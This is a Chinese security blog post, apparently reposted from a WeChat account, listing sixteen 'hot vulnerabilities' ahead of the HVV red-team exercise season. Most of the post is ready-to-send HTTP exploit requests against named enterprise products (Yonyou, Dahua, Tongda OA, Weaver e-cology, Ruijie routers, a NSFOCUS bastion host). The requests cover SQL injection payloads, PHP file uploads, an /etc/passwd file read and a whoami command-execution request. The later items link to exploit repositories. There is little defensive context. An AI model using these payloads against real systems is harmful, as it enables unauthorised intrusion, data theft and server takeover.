Hvv前夕部分热点漏洞

admin 2023年8月13日07:18:50评论3 views字数 6756阅读22分31秒阅读模式
Hvv前夕部分热点漏洞

1.【任我行 CRM SmsDataList SQL注入

POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.1361.63 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 170
Keywords=&StartSendDate=2020-06-17&EndSendDate=2020-09-17&SenderTypeId=00000000*

Hvv前夕部分热点漏洞

2.【PigCMS action_flashUpload 任意文件上传漏洞

POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.2840.80 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: multipart/form-data; boundary=----aaaContent-Length: 134
------aaaContent-Disposition: form-data; name="filePath"; filename="test.php"Content-Type: video/x-flv
<?php print "qaxnb123";?>------aaa

3.【用友GRP-U8 info.log信息泄露

url + /logs/info.log

4.【大华智慧园区综合管理平台searchJson SQL注入

GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20@@version),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1Host: 127.0.0.1:8009User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.2333.119 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: close

5.【绿盟 SAS堡垒机 Exec 远程命令执行

GET /webconf/Exec/index?cmd=whoami HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.2785.42 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: close

Hvv前夕部分热点漏洞

6.【锐捷 NBR 路由器 fileupload.php 任意文件上传

POST /ddi/server/fileupload.php?uploadDir=../../test&name=c0nfig.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.1360.23 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Disposition: form-data; name="file"; filename="111.php"Content-Type: image/jpegContent-Length: 8
qaxnb123

Hvv前夕部分热点漏洞

7.【蓝凌oa custom.jsp存在任意文件读取漏洞

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1Host: 127.0.0.1:10082User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.1294.71 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 42
var={"body":{"file":"file:///etc/passwd"}}

Hvv前夕部分热点漏洞

Hvv前夕部分热点漏洞

8.【深信服 应用交付管理系统 login 文件存在远程命令执行漏洞

  • https://github.com/MzzdToT/HAC_Bored_Writing/tree/main/RCE/sangfor-login-rce

9.【通达OA general/system/seal_manage/dianju/delete_log.php 存在SQL注入漏洞

GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1Host: 127.0.0.1:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1

10.【泛微e-cology9 SQL注入

POST /mobile/%20/plugin/browser.jsp HTTP/1.1Host: xxxxxxxxUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.15.99 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 2661
isDis=1&browserTypeId=269&keyword=25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%38%25%32%35%25%33%37%25%33%38%25%32%35%25%33%32%25%33%35%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%38%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%30%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%38%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%34%25%32%35%25%33%35%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%34%25%36%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%33%37%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%33%38%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%33%34%25%32%35%25%33%33%25%36%34%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%33%25%33%31

11.【泛微 E-Office 9.5版本中文件上传

  • https://github.com/MzzdToT/HAC_Bored_Writing/tree/main/Fileupload/cve-2023-2648

12.【用友网络科技股份有限公司NC Cloud存在命令执行漏洞

  • https://github.com/MzzdToT/HAC_Bored_Writing/tree/main/RCE/Yongyou_NC_Cloud_upload_rce
  • 13.【金蝶云星空是一款云端企业资源管理(ERP)软件反序列漏洞https://github.com/MzzdToT/HAC_Bored_Writing/tree/main/RCE/Kingdee_erp_Unserialize_rce

14.【H3C Intelligent Management Center 存在命令执行漏洞

  • https://github.com/MzzdToT/HAC_Bored_Writing/tree/main/RCE/CVE-2023-34928

15.【Openfire身份认证绕过漏洞

  • https://github.com/MzzdToT/HAC_Bored_Writing/tree/main/unauthorized/CVE-2023-32315

16.【jmreport/qurestSql 未授权SQL注入

  • https://github.com/MzzdToT/HAC_Bored_Writing/tree/main/Sqlinject/CVE-2023-1454

 

 

感谢您抽出

Hvv前夕部分热点漏洞

.

Hvv前夕部分热点漏洞

.

Hvv前夕部分热点漏洞

来阅读本文

Hvv前夕部分热点漏洞

点它,分享点赞在看都在这里

原文始发于微信公众号(Ots安全):Hvv前夕部分热点漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月13日07:18:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Hvv前夕部分热点漏洞http://cn-sec.com/archives/1987349.html

发表评论

匿名网友 填写信息